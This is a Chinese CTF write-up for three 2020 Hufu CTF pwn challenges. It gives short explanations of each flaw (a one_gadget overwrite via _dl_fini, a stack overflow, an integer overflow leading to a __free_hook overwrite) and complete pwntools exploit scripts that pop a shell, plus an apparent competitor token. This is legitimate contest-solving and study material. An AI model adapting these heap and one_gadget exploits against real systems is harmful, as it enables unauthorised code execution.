虎符 CTF Pwn 部分 Writeup

April 20, 2020 CTF-Writeup 访问: 65 次

MarksMan

这道题在本地打通了,远程打不通,可能我用的那个one_gg碰撞的难度有点大

赛后看wp,发现one_gadget -l参数可以获取更多的one_gg,然后三个字节写入,我写入的是_dl_fini函数里面的一个地址,在函数退出的时候会执行到

exp:

from pwn import *
# from LibcSearcher import *
context.log_level='debug'
debug = 0
file_name = './chall'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = "node3.buuoj.cn"#'39.97.210.182'
prot = '27628'#'10055'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

def debug():
    gdb.attach(r)
    raw_input()

file = ELF(file_name)
sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
ru("near: ")
libc_base = eval(rud("\n"))-libc.symbols['puts']
li("libc_base",libc_base)
aa = 0x81df60 + libc_base
# aa = 0x619f60+libc_base
li("aa",aa)
one_gg = 0x10a38c+libc_base
li("one_gg:",0x4f2c5+libc_base)
li("one_gg:",0x4f322+libc_base)
li("one_gg:",0x10a38c+libc_base)
ru("shoot!shoot!\n")
sl(str(aa))
ru("biang!")
sl("\x87")
ru("biang!")
sl(chr((one_gg>>8)&0xff))
ru("biang!")
# debug()
sl(chr((one_gg>>16)&0xff))
# debug()
# sleep(0.5)
# ru("token:")
# sl("icq517119cb398ae74312f50ccd14f5b")
ri()

count

很简单的一个arm pwn,计算一系列算式后,栈溢出,即可获取到shell
exp:

from pwn import *
# from LibcSearcher import *
context.log_level='debug'
debug = 0
file_name = './pwn'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = '39.97.210.182'
prot = '40285'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

def debug():
    gdb.attach(r)
    raw_input()


file = ELF(file_name)
sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()

for x in range(200):
    ru("Math: ")
    aaa = rud(" =")
    bbb = eval(aaa)
    ru("nput answer:")
    sl(str(bbb))
payload = "a"*0x64+p64(0x12235612)
sl(payload)
ru("token:")
sl("icq517119cb398ae74312f50ccd14f5b")
ri()

SecureBox

这道题其实很简单,只不过是libc-2.30的,所以有一些新的特性

分析程序,发现在add模块存在整形溢出,cmp eax, 0FFFh比较上界是和eax比的,而我们输入的是64位的,所以可以伪造一个很大的数字,造成malloc返回0,然后enc的时候,输入任何地址的偏移即可修改,造成任意地址写

泄露地址的话,就是通过申请大于tcachechunk,直接到unsortbin中,再申请回来即可出现libc地址
exp:

from pwn import *
import sys
context.log_level='debug'
debug = 1
context.terminal = ['tmux', 'splitw', '-h']
file_name = './chall'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
prot = ''
if debug:
    r = process(file_name)#,env={"LD_PRELOAD":"./libc.so.6"}
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
def change_type(arr):
    num = []
    for x in arr:
        if x!="":
            num.append(eval("0x"+x))
    return num

def add(chunk_size):
    ru('5.Exit\n')
    sl('1')
    ru('Size: ')
    sl(str(chunk_size))
    rud("Key: \n")
    enc_key = rud("\n")
    return enc_key
def delete(index):
    ru('5.Exit\n')
    sl('2')
    ru('Box ID: ')
    sl(str(index))
def show(index,O_size,L_size):
    ru('5.Exit\n')
    sl('4')
    ru('Box ID: ')
    sl(str(index))
    ru("Offset of msg: ")
    sl(str(O_size))
    ru("Len of msg: ")
    sl(str(L_size))
def enc(index,O_size,L_size,value):
    ru('5.Exit\n')
    sl('3')
    ru('Box ID: ')
    sl(str(index))
    ru('Offset of msg: ')
    sl(str(O_size))
    ru("Len of msg: ")
    sl(str(L_size))
    ru("Msg: \n")
    sl(value)
def debug():
    gdb.attach(r)

key_1 = change_type(add(0x500).split(" ",-1))
key_2 = change_type(add(0x500).split(" ",-1))
delete(0)
key_3 = change_type(add(0x500).split(" ",-1))
show(0,0,8)
ru("Msg: \n")
libc_base = u64(r.recv(6)+"\x00\x00")-0x1eabe0
li("libc_base:",libc_base)
free_hook = libc_base + libc.symbols['__free_hook']
li("free_hook:",free_hook)
system_addr = libc_base + libc.symbols['system']
key_3 = change_type(add(0x7fffffff00000300).split(" ",-1))

enc_system = ""
for x in range(len(p64(system_addr))):
    enc_system+=chr(ord(p64(system_addr)[x])^key_3[x])

enc(2,free_hook,8,enc_system)

binsh_sh = "/bin/sh\x00"
enc_binsh = ""
for x in range(len(binsh_sh)):
    enc_binsh+=chr(ord(binsh_sh[x])^key_2[x])
enc(1,0,8,enc_binsh)

delete(1)
ri()

添加新评论